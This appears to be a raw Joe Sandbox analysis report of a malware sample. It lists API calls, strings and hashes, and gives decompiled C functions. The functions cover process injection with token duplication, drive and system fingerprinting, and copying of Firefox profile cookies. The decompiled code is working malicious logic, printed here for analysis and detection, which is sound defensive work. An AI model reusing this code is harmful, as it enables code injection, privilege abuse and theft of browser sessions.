                                                              • Part of subcall function 04645CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04645CCB
                                                              • Part of subcall function 04645CA0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 04645CE5
                                                              • Part of subcall function 04645CA0: Process32NextW.KERNEL32(00000000,0000022C), ref: 04645D06
                                                              • Part of subcall function 04645CA0: FindCloseChangeNotification.KERNEL32(00000000), ref: 04645D1C
                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,00000000,00000000,74D0F750), ref: 046499DD
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,InitializeProcThreadAttributeList,?,?,?,00000000,00000000,74D0F750), ref: 046499FB
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04649A02
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,UpdateProcThreadAttribute,?,?,?,00000000,00000000,74D0F750), ref: 04649A10
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04649A17
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04649ABB
                                                            • wsprintfW.USER32 ref: 04649B08
                                                            • LoadLibraryA.KERNEL32(Wtsapi32.dll,WTSEnumerateSessionsW,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649B35
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04649B3C
                                                              • Part of subcall function 04645D40: GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,?,?,04646FEC,00000000,74CB4DC0), ref: 04645D58
                                                              • Part of subcall function 04645D40: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,04646FEC,00000000,74CB4DC0), ref: 04645D65
                                                            • LoadLibraryA.KERNEL32(Wtsapi32.dll,WTSFreeMemory,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649BC4
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04649BCB
                                                            • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649BE6
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000048,?), ref: 04649C2A
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,DeleteProcThreadAttributeList,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649C46
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04649C4D
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649C70
                                                            • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649C8D
                                                            • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649CAD
                                                            • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649CC5
                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649CF8
                                                            • OpenProcessToken.ADVAPI32(00000000,0000000B,00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649D08
                                                            • DuplicateTokenEx.ADVAPI32(00000000,02000000,00000000,00000000,00000001,00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649D2A
                                                            • SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649D45
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649D5B
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649D75
                                                            • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000048,?), ref: 04649DAA
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649DB9
                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649DE8
                                                            • SetThreadContext.KERNEL32(?,00010007,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649E09
                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649E1D
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649E38
                                                            • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 04649EC9
                                                            • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 04649ED4
                                                            • OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 04649F3E
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04649F4D
                                                            • GetExitCodeThread.KERNEL32(00000000,?), ref: 04649F55
                                                              • Part of subcall function 0464AAD0: SetConsoleCtrlHandler.KERNEL32(0464AAF0,00000000,00000000,04649F90), ref: 0464AADE
                                                            • CloseHandle.KERNEL32(00000000), ref: 04649F9B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$Close$Handle$AddressLibraryLoadProcThread$Open$CreateCurrentSleepToken$ContextProcess32$AllocChangeCodeConsoleCtrlDirectoryDuplicateExitFindFirstHandlerInformationMemoryNextNotificationObjectResumeSingleSnapshotSystemTerminateToolhelp32UserVersionVirtualWaitWritewsprintf
                                                            • String ID: %ssvchost.exe -k WspService$Control$DeleteProcThreadAttributeList$Dispatch$H$InitializeProcThreadAttributeList$SeAssignPrimaryTokenPrivilege$SeDebugPrivilege$SeIncreaseQuotaPrivilege$SeTcbPrivilege$UpdateProcThreadAttribute$WTSEnumerateSessionsW$WTSFreeMemory$Wtsapi32.dll$\$kernel32.dll
                                                            • API String ID: 2047191768-3917686819
                                                            • Opcode ID: 9d6858b745af57e8966695f5b542952351d1dddcd87000c09da94b0e3bf2af64
                                                            • Instruction ID: c004e5fdc1a4c5f6d8f6f1416fa54e5b5f30eb271d9a91a38add1e5635789514
                                                            • Opcode Fuzzy Hash: 9d6858b745af57e8966695f5b542952351d1dddcd87000c09da94b0e3bf2af64
                                                            • Instruction Fuzzy Hash: 4B02B8B1A803199BEF249F60DC48B9B77B8FF94710F0445A5E549A6280FF74AE48CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E046348F0(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v1052;
                                                            				short _v2092;
                                                            				struct _SHFILEINFOW _v2788;
                                                            				intOrPtr _v2792;
                                                            				signed int _v2796;
                                                            				union _ULARGE_INTEGER* _v2800;
                                                            				intOrPtr _v2804;
                                                            				signed int _v2808;
                                                            				signed int _v2816;
                                                            				union _ULARGE_INTEGER _v2820;
                                                            				signed int _v2824;
                                                            				union _ULARGE_INTEGER _v2828;
                                                            				signed int _t83;
                                                            				signed int _t98;
                                                            				int _t114;
                                                            				int _t121;
                                                            				signed int _t136;
                                                            				void* _t156;
                                                            				signed int _t157;
                                                            				WCHAR* _t167;
                                                            				intOrPtr* _t168;
                                                            				void* _t170;
                                                            				void* _t175;
                                                            				void* _t176;
                                                            				void* _t178;
                                                            				intOrPtr _t180;
                                                            				intOrPtr _t183;
                                                            				void* _t184;
                                                            				void* _t185;
                                                            				signed int _t186;
                                                            				void* _t187;
                                                            				void* _t191;
                                                            
                                                            				_t157 = __ecx;
                                                            				_t83 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t83 ^ _t186;
                                                            				_v2808 = __ecx;
                                                            				_t156 = LocalAlloc(0x40, 0x800);
                                                            				 *_t156 = 0x68;
                                                            				GetLogicalDriveStringsW(0x208,  &_v2092);
                                                            				_t167 =  &_v2092;
                                                            				asm("xorps xmm0, xmm0");
                                                            				_t175 = 1;
                                                            				asm("movlpd [ebp-0xb00], xmm0");
                                                            				asm("movlpd [ebp-0xb08], xmm0");
                                                            				if(_v2092 != 0) {
                                                            					do {
                                                            						E0465DEA0(_t167,  &_v1052, 0, 0x410);
                                                            						_t191 = _t187 + 0xc;
                                                            						GetVolumeInformationW(_t167, 0, 0, 0, 0, 0,  &_v1052, 0x208);
                                                            						SHGetFileInfoW(_t167, 0x80,  &_v2788, 0x2b4, 0x410);
                                                            						_v2804 = 2 + lstrlenW( &(_v2788.szTypeName)) * 2;
                                                            						_v2792 = 2 + lstrlenW( &_v1052) * 2;
                                                            						_t136 =  *_t167 & 0x0000ffff;
                                                            						if(_t136 == 0x41 || _t136 == 0x42 || GetDiskFreeSpaceExW(_t167,  &_v2828,  &_v2820, 0) == 0) {
                                                            							_v2796 = 0;
                                                            							_v2800 = 0;
                                                            						} else {
                                                            							_v2796 = (_v2816 << 0x00000020 | _v2820.LowPart) >> 0x14;
                                                            							_t157 = (_v2824 << 0x00000020 | _v2828.LowPart) >> 0x14;
                                                            							_v2800 = _t157;
                                                            						}
                                                            						 *((short*)(_t175 + _t156)) =  *_t167;
                                                            						 *((char*)(_t175 + _t156 + 2)) = GetDriveTypeW(_t167);
                                                            						 *(_t175 + _t156 + 6) = _v2796;
                                                            						 *(_t175 + _t156 + 0xa) = _v2800;
                                                            						_t184 = _t175 + 0xe;
                                                            						E0465E060(_t184 + _t156,  &(_v2788.szTypeName), _v2804);
                                                            						_t185 = _t184 + _v2804;
                                                            						E0465E060(_t185 + _t156,  &_v1052, _v2792);
                                                            						_t175 = _t185 + _v2792;
                                                            						_t187 = _t191 + 0x18;
                                                            						_t167 =  &(( &(_t167[lstrlenW(_t167)]))[1]);
                                                            					} while ( *_t167 != 0);
                                                            				}
                                                            				_t168 = __imp__SHGetSpecialFolderPathW;
                                                            				_t176 = _t175 + 2;
                                                            				 *((short*)(_t176 + _t156 - 2)) = 0;
                                                            				 *_t168(0,  &_v1052, 0x10, 0);
                                                            				E0465E060(_t176 + _t156,  &_v1052, 2 + lstrlenW( &_v1052) * 2);
                                                            				_t98 = lstrlenW( &_v1052);
                                                            				_t178 = _t176 + _t98 * 2 + 2;
                                                            				 *_t168(0,  &_v1052, 5, 0);
                                                            				E0465E060(_t178 + _t156,  &_v1052, 2 + lstrlenW( &_v1052) * 2);
                                                            				_t180 = _t178 + lstrlenW( &_v1052) * 2 + 2;
                                                            				_v2792 = _t180;
                                                            				_t170 = E046347A0();
                                                            				if(_t170 != 0) {
                                                            					_t114 = LocalSize(_t170);
                                                            					if(_t180 + _t114 <= LocalSize(_t156)) {
                                                            						_t183 = _v2792;
                                                            					} else {
                                                            						_t121 = LocalSize(_t170);
                                                            						_t183 = _v2792;
                                                            						_t156 = LocalReAlloc(_t156, _t121 + _t183, 0x42);
                                                            					}
                                                            					E0465E060(_t183 + _t156, _t170, LocalSize(_t170));
                                                            					_t180 = _t183 + LocalSize(_t170);
                                                            					LocalFree(_t170);
                                                            				}
                                                            				_push(_t157);
                                                            				_push(0x3f);
                                                            				_push(_t180);
                                                            				E04631C60( *((intOrPtr*)(_v2808 + 4)));
                                                            				LocalFree(_t156);
                                                            				return E04655AFE(_v8 ^ _t186, _t156);
                                                            			}




































                                                            0x046348f0
                                                            0x046348f9
                                                            0x04634900
                                                            0x0463490d
                                                            0x04634919
                                                            0x04634927
                                                            0x0463492a
                                                            0x04634938
                                                            0x0463493e
                                                            0x04634941
                                                            0x04634946
                                                            0x0463494e
                                                            0x04634956
                                                            0x04634960
                                                            0x0463496e
                                                            0x04634973
                                                            0x0463498d
                                                            0x046349aa
                                                            0x046349c4
                                                            0x046349de
                                                            0x046349e4
                                                            0x046349ea
                                                            0x04634a40
                                                            0x04634a4a
                                                            0x04634a0c
                                                            0x04634a25
                                                            0x04634a31
                                                            0x04634a35
                                                            0x04634a3b
                                                            0x04634a58
                                                            0x04634a68
                                                            0x04634a72
                                                            0x04634a7c
                                                            0x04634a80
                                                            0x04634a8e
                                                            0x04634a93
                                                            0x04634aaa
                                                            0x04634aaf
                                                            0x04634ab5
                                                            0x04634ac2
                                                            0x04634ac5
                                                            0x04634960
                                                            0x04634acf
                                                            0x04634ad5
                                                            0x04634adb
                                                            0x04634aeb
                                                            0x04634b0d
                                                            0x04634b1c
                                                            0x04634b32
                                                            0x04634b35
                                                            0x04634b59
                                                            0x04634b6d
                                                            0x04634b70
                                                            0x04634b7b
                                                            0x04634b7f
                                                            0x04634b82
                                                            0x04634b93
                                                            0x04634bb2
                                                            0x04634b95
                                                            0x04634b98
                                                            0x04634b9e
                                                            0x04634bae
                                                            0x04634bae
                                                            0x04634bc5
                                                            0x04634bdb
                                                            0x04634bdd
                                                            0x04634bdd
                                                            0x04634be7
                                                            0x04634bee
                                                            0x04634bf0
                                                            0x04634bf5
                                                            0x04634bfd
                                                            0x04634c11

                                                            APIs
                                                            • LocalAlloc.KERNEL32(00000040,00000800), ref: 04634913
                                                            • GetLogicalDriveStringsW.KERNEL32(00000208,?), ref: 0463492A
                                                            • GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000208), ref: 0463498D
                                                            • SHGetFileInfoW.SHELL32(00000000,00000080,?,000002B4,00000410), ref: 046349AA
                                                            • lstrlenW.KERNEL32(?), ref: 046349B7
                                                            • lstrlenW.KERNEL32(?), ref: 046349D1
                                                            • GetDiskFreeSpaceExW.KERNEL32(00000000,?,?,00000000), ref: 04634A02
                                                            • GetDriveTypeW.KERNEL32(00000000), ref: 04634A5C
                                                            • lstrlenW.KERNEL32(00000000), ref: 04634AB9
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 04634AEB
                                                            • lstrlenW.KERNEL32(?), ref: 04634AF4
                                                            • lstrlenW.KERNEL32(?), ref: 04634B1C
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000005,00000000), ref: 04634B35
                                                            • lstrlenW.KERNEL32(?), ref: 04634B44
                                                            • lstrlenW.KERNEL32(?), ref: 04634B68
                                                            • LocalSize.KERNEL32(00000000), ref: 04634B82
                                                            • LocalSize.KERNEL32(00000000), ref: 04634B8B
                                                            • LocalSize.KERNEL32(00000000), ref: 04634B98
                                                            • LocalReAlloc.KERNEL32(00000000,00000000), ref: 04634BA8
                                                            • LocalSize.KERNEL32(00000000), ref: 04634BB9
                                                            • LocalSize.KERNEL32(00000000), ref: 04634BCE
                                                            • LocalFree.KERNEL32(00000000), ref: 04634BDD
                                                            • LocalFree.KERNEL32(00000000,00000000,?,0000003F), ref: 04634BFD
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$lstrlen$Size$Free$AllocDriveFolderPathSpecial$DiskFileInfoInformationLogicalSpaceStringsTypeVolume
                                                            • String ID:
                                                            • API String ID: 4186219405-0
                                                            • Opcode ID: e8a923e1e7dcd76c3a09f20ad8019be790ce4c7e12be45a76295f3d7ac2cef18
                                                            • Instruction ID: bb6c7c2e897e9b6a52a94ec09a1169aef7d094a980698d8181c68d0af0ac1dd4
                                                            • Opcode Fuzzy Hash: e8a923e1e7dcd76c3a09f20ad8019be790ce4c7e12be45a76295f3d7ac2cef18
                                                            • Instruction Fuzzy Hash: EC9180729002199BDB20DF54DC88BEEB3BCEB45300F4040A9E54AE7240EF74AE85CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E04636A40(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v12;
                                                            				short _v536;
                                                            				short _v1056;
                                                            				short _v1576;
                                                            				short _v2096;
                                                            				struct _WIN32_FIND_DATAW _v2688;
                                                            				char _v2692;
                                                            				intOrPtr _v2696;
                                                            				char _v2712;
                                                            				signed int _t34;
                                                            				int _t60;
                                                            				intOrPtr _t76;
                                                            				void* _t77;
                                                            				void* _t89;
                                                            				void* _t91;
                                                            				signed int _t92;
                                                            				void* _t93;
                                                            				void* _t94;
                                                            
                                                            				_t34 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t34 ^ _t92;
                                                            				_t76 = __ecx;
                                                            				_v2692 = 0x104;
                                                            				_v2696 = __ecx;
                                                            				_t79 =  &_v536;
                                                            				if(E04647240( &_v536,  &_v2692, __eflags) == 0) {
                                                            					__eflags = _v12 ^ _t92;
                                                            					return E04655AFE(_v12 ^ _t92);
                                                            				} else {
                                                            					lstrcatW( &_v536, L"\\AppData\\Roaming\\Mozilla\\Firefox");
                                                            					_t77 = wsprintfW;
                                                            					wsprintfW( &_v1576, L"%s\\%s",  &_v536,  *((intOrPtr*)(_t76 + 0x70)));
                                                            					wsprintfW( &_v2096, L"%s%s",  &_v536, L"\\Profiles\\*.*");
                                                            					_t94 = _t93 + 0x20;
                                                            					_t89 = FindFirstFileW( &_v2096,  &_v2688);
                                                            					if(_t89 != 0xffffffff) {
                                                            						_t91 = lstrcmpW;
                                                            						do {
                                                            							if(lstrcmpW( &(_v2688.cFileName), ".") == 0 || lstrcmpW( &(_v2688.cFileName), L"..") == 0) {
                                                            								goto L6;
                                                            							} else {
                                                            								wsprintfW( &_v1056, L"%s\\Profiles\\%s\\cookies.sqlite",  &_v536,  &(_v2688.cFileName));
                                                            								_t94 = _t94 + 0x10;
                                                            								if(PathFileExistsW( &_v1056) != 0) {
                                                            									wsprintfW( &_v1056, L"%s\\Profiles\\%s",  &_v536,  &(_v2688.cFileName));
                                                            									_t94 = _t94 + 0x10;
                                                            									_t79 =  &_v1056;
                                                            									L046473D0(_t77,  &_v1056,  &_v1576, _t89, _t91);
                                                            								} else {
                                                            									goto L6;
                                                            								}
                                                            							}
                                                            							L9:
                                                            							FindClose(_t89);
                                                            							goto L10;
                                                            							L6:
                                                            							_t60 = FindNextFileW(_t89,  &_v2688);
                                                            							_t104 = _t60;
                                                            						} while (_t60 != 0);
                                                            						goto L9;
                                                            					}
                                                            					L10:
                                                            					wsprintfW( &_v536, L"cmd.exe /c start firefox.exe -no-remote -profile \"%s\"",  &_v1576);
                                                            					asm("xorps xmm0, xmm0");
                                                            					asm("movups [ebp-0xa94], xmm0");
                                                            					_push( &_v2712);
                                                            					_push( &_v536);
                                                            					E046472E0(_t77,  *((intOrPtr*)(_v2696 + 0x70)), _t104);
                                                            					return E04655AFE(_v12 ^ _t92, _t79);
                                                            				}
                                                            			}





















                                                            0x04636a49
                                                            0x04636a50
                                                            0x04636a54
                                                            0x04636a56
                                                            0x04636a68
                                                            0x04636a6e
                                                            0x04636a7b
                                                            0x04636bf1
                                                            0x04636bfc
                                                            0x04636a81
                                                            0x04636a8d
                                                            0x04636a96
                                                            0x04636aaf
                                                            0x04636ac9
                                                            0x04636acb
                                                            0x04636ae2
                                                            0x04636ae7
                                                            0x04636aed
                                                            0x04636af3
                                                            0x04636b03
                                                            0x00000000
                                                            0x04636b17
                                                            0x04636b31
                                                            0x04636b33
                                                            0x04636b45
                                                            0x04636b75
                                                            0x04636b77
                                                            0x04636b80
                                                            0x04636b86
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04636b45
                                                            0x04636b8b
                                                            0x04636b8c
                                                            0x00000000
                                                            0x04636b47
                                                            0x04636b4f
                                                            0x04636b55
                                                            0x04636b55
                                                            0x00000000
                                                            0x04636b59
                                                            0x04636b92
                                                            0x04636ba5
                                                            0x04636bb6
                                                            0x04636bb9
                                                            0x04636bc3
                                                            0x04636bcd
                                                            0x04636bcf
                                                            0x04636be7
                                                            0x04636be7

                                                            APIs
                                                              • Part of subcall function 04647240: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,046368B1), ref: 04647269
                                                              • Part of subcall function 04647240: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04647279
                                                              • Part of subcall function 04647240: CloseHandle.KERNEL32(?,?,?,?,046368B1), ref: 046472A0
                                                            • lstrcatW.KERNEL32(?,\AppData\Roaming\Mozilla\Firefox), ref: 04636A8D
                                                            • wsprintfW.USER32 ref: 04636AAF
                                                            • wsprintfW.USER32 ref: 04636AC9
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 04636ADC
                                                            • lstrcmpW.KERNEL32(?,0467D940), ref: 04636AFF
                                                            • lstrcmpW.KERNEL32(?,0467D944), ref: 04636B11
                                                            • wsprintfW.USER32 ref: 04636B31
                                                            • PathFileExistsW.SHLWAPI(?), ref: 04636B3D
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 04636B4F
                                                            • wsprintfW.USER32 ref: 04636B75
                                                            • FindClose.KERNEL32(00000000), ref: 04636B8C
                                                            • wsprintfW.USER32 ref: 04636BA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: wsprintf$FileFind$Closelstrcmp$AddressExistsFirstHandleLibraryLoadNextPathProclstrcat
                                                            • String ID: %s%s$%s\%s$%s\Profiles\%s$%s\Profiles\%s\cookies.sqlite$\AppData\Roaming\Mozilla\Firefox$\Profiles\*.*$cmd.exe /c start firefox.exe -no-remote -profile "%s"
                                                            • API String ID: 2816992129-409733341
                                                            • Opcode ID: 23c1c22c739171aea8548263ebe74afc14cb75282fffd71463284f3559f2c69f
                                                            • Instruction ID: eaf58458c096cfa1fe3f340509ced70a372c272c91b8f8d5e523689636166bf8
                                                            • Opcode Fuzzy Hash: 23c1c22c739171aea8548263ebe74afc14cb75282fffd71463284f3559f2c69f
                                                            • Instruction Fuzzy Hash: B8414872A4021DA7DB20DB64DC88DEA73BCFF58311F4045E6E509E3101FA35BA958F65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 69%
                                                            			E0464B0C0(void* __ebx, int __ecx, union %anon243 __edx, void* __edi, void* __esi, signed short* _a4, signed short* _a8, signed short* _a12, intOrPtr _a16) {
                                                            				signed int _v8;
                                                            				signed int _v40;
                                                            				void _v428;
                                                            				short _v628;
                                                            				void* _v668;
                                                            				struct _MEMORYSTATUSEX _v740;
                                                            				struct _SYSTEM_INFO _v776;
                                                            				char _v788;
                                                            				int _v792;
                                                            				int _v796;
                                                            				intOrPtr _v800;
                                                            				void* _v804;
                                                            				char _v808;
                                                            				signed int _t77;
                                                            				signed int _t79;
                                                            				intOrPtr _t81;
                                                            				signed int _t89;
                                                            				signed int _t93;
                                                            				char* _t95;
                                                            				intOrPtr _t99;
                                                            				signed int _t116;
                                                            				signed int _t117;
                                                            				signed int _t118;
                                                            				signed int _t119;
                                                            				void* _t129;
                                                            				void* _t130;
                                                            				int _t131;
                                                            				signed int _t133;
                                                            				signed int _t141;
                                                            				signed short* _t146;
                                                            				signed short* _t148;
                                                            				signed int _t156;
                                                            				void* _t160;
                                                            				signed int _t162;
                                                            				signed int _t164;
                                                            				signed short* _t165;
                                                            				intOrPtr* _t179;
                                                            				void* _t181;
                                                            				void* _t182;
                                                            				signed int _t184;
                                                            				signed int _t188;
                                                            				signed int _t190;
                                                            				void* _t191;
                                                            				void* _t193;
                                                            
                                                            				_t167 = __edi;
                                                            				_t136 = __ecx;
                                                            				_t190 = (_t188 & 0xfffffff8) - 0x31c;
                                                            				_t77 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t77 ^ _t190;
                                                            				_t79 =  *0x46878d0; // 0x0
                                                            				_v776.dwOemId = __edx;
                                                            				_v792 = __ecx;
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				_t195 = _t79;
                                                            				if(_t79 == 0) {
                                                            					_t131 = L04655B14(__esi, _t195, 0x3c);
                                                            					_t190 = _t190 + 4;
                                                            					_t136 = _t131;
                                                            					_t79 = E046362B0(__ebx, _t131, __edi);
                                                            					 *0x46878d0 = _t79;
                                                            				}
                                                            				_t179 =  *_t79;
                                                            				if(_t179 != 0) {
                                                            					_t81 =  *_t179 + 0x378;
                                                            					_push(_t81);
                                                            					_v776.dwPageSize = _t81;
                                                            					_t133 = L04655B55(_t136, _t179, __eflags);
                                                            					_t190 = _t190 + 4;
                                                            					__eflags = _t133;
                                                            					if(_t133 == 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						_t6 = _t133 + 0x350; // 0x350
                                                            						E0465E060(_t6, _t179,  *_t179 + 0x28);
                                                            						_t89 =  *0x46878d0; // 0x0
                                                            						_t191 = _t190 + 0xc;
                                                            						__eflags = _t89;
                                                            						if(__eflags == 0) {
                                                            							_t130 = L04655B14(_t179, __eflags, 0x3c);
                                                            							_t191 = _t191 + 4;
                                                            							_t89 = E046362B0(_t133, _t130, _t167);
                                                            							 *0x46878d0 = _t89;
                                                            						}
                                                            						asm("movups xmm0, [eax+0x4]");
                                                            						asm("movups [ebx+0x8], xmm0");
                                                            						asm("movups xmm0, [eax+0x14]");
                                                            						asm("movups [ebx+0x18], xmm0");
                                                            						 *((char*)(_t133 + 0x28)) =  *((intOrPtr*)(_t89 + 0x24));
                                                            						 *_t133 = 0x99;
                                                            						 *((intOrPtr*)(_t133 + 0x348)) = GetTickCount();
                                                            						 *((intOrPtr*)(_t133 + 0x34c)) = GetCurrentProcessId();
                                                            						_t93 =  *0x46878d0; // 0x0
                                                            						__eflags = _t93;
                                                            						if(__eflags == 0) {
                                                            							_t129 = L04655B14(_t179, __eflags, 0x3c);
                                                            							_t191 = _t191 + 4;
                                                            							_t93 = E046362B0(_t133, _t129, _t167);
                                                            							 *0x46878d0 = _t93;
                                                            						}
                                                            						_t181 =  *(_t93 + 0x28);
                                                            						_t12 = _t133 + 0x2c; // 0x2c
                                                            						_t95 = memcpy(_t12, _t181, 0x48 << 2);
                                                            						_t171 = _t181 + 0x90;
                                                            						gethostname(_t95, 0x100);
                                                            						asm("movups xmm0, [esp+0x90]");
                                                            						_t15 = _t133 + 0x2e8; // 0x2e8
                                                            						_t182 = _t15;
                                                            						asm("movups [ebx+0x158], xmm0");
                                                            						asm("movups xmm0, [esp+0xa8]");
                                                            						asm("movups [ebx+0x168], xmm0");
                                                            						asm("movups xmm0, [esp+0xbc]");
                                                            						asm("movups [ebx+0x178], xmm0");
                                                            						 *((short*)(_t133 + 0x188)) = _v628;
                                                            						E0465DEA0(_t181 + 0x90, _t182, 0, 0x5e);
                                                            						_t99 = _v800;
                                                            						_t19 = _t133 + 0x346; // 0x346
                                                            						_t160 = _t19;
                                                            						_t193 = _t191 + 0x18;
                                                            						_v808 = 0x2f;
                                                            						_t141 =  *(_t99 + 0x5c) & 0x0000ffff;
                                                            						__eflags = _t141 - 1;
                                                            						if(_t141 != 1) {
                                                            							__eflags = _t141 - 2;
                                                            							if(_t141 == 2) {
                                                            								_t156 =  *((intOrPtr*)(_t99 + 0x24)) + 4;
                                                            								__eflags = _t156;
                                                            								goto L13;
                                                            							}
                                                            						} else {
                                                            							_t156 =  *(_t99 + 0x20);
                                                            							L13:
                                                            							 *((intOrPtr*)( *_t156 + 0x34))(_t182,  &_v808, _t160);
                                                            						}
                                                            						GetSystemInfo( &_v776);
                                                            						 *((short*)(_t133 + 0x14c)) = _v776.dwNumberOfProcessors;
                                                            						_v796 = 4;
                                                            						_v792 = 4;
                                                            						RegOpenKeyW(0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0",  &_v804);
                                                            						RegQueryValueExW(_v804, L"~MHz", 0,  &_v792,  &_v788,  &_v796);
                                                            						RegCloseKey(_v804);
                                                            						 *(_t133 + 0x150) = _v788;
                                                            						_v740.dwLength = 0x40;
                                                            						GlobalMemoryStatusEx( &_v740);
                                                            						 *(_t133 + 0x154) = (_v740.ullTotalPhys << 0x00000020 | _v740.dwMemoryLoad) >> 0x14;
                                                            						__imp__CoInitialize(0);
                                                            						 *((intOrPtr*)(_t133 + 0x2e4)) = E04632DB0(_t133, 0, _t171, _t182);
                                                            						__imp__CoUninitialize();
                                                            						 *((intOrPtr*)(_t133 + 0x18c)) = _v792;
                                                            						__eflags = E0464AE80(_t133,  &_v428, _t171, _t182, __eflags);
                                                            						if(__eflags == 0) {
                                                            							_t146 = _a4;
                                                            							_t56 = _t133 + 0x190; // 0x190
                                                            							_t162 = _t56 - _t146;
                                                            							__eflags = _t162;
                                                            							do {
                                                            								_t116 =  *_t146 & 0x0000ffff;
                                                            								_t146 =  &(_t146[1]);
                                                            								 *(_t162 + _t146 - 2) = _t116;
                                                            								__eflags = _t116;
                                                            							} while (__eflags != 0);
                                                            						} else {
                                                            							_t52 = _t133 + 0x190; // 0x190
                                                            							_t182 =  &_v428;
                                                            							memcpy(_t52, _t182, 0x19 << 2);
                                                            							_t193 = _t193 + 0xc;
                                                            							_t171 = _t182 + 0x32;
                                                            						}
                                                            						_t117 = E0464AFA0(_t133,  &_v428, _t171, _t182, __eflags);
                                                            						__eflags = _t117;
                                                            						if(_t117 == 0) {
                                                            							_t148 = _a8;
